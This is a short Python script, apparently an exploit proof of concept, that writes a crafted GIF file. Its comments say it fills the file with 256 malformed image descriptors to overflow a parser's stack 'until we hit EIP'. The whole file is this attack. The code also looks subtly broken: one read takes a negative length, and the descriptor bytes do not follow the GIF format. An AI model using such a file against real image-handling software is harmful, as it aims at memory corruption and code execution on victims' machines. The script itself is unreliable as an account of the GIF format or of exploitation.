#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header + data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once, each
    # with a length of 7, which allows us to overflow the stack
    # with junk data until we hit EIP
    for i in range(256):
        descriptor = b'\x2C\x00\x00\x00\xFF\xF0\x07' + \
                rng.read(7 - len(data)) + data[len(data)-7:]
        out.write(descriptor)

    # Then we just need to write the trailer and we're good
    out.write(b';')
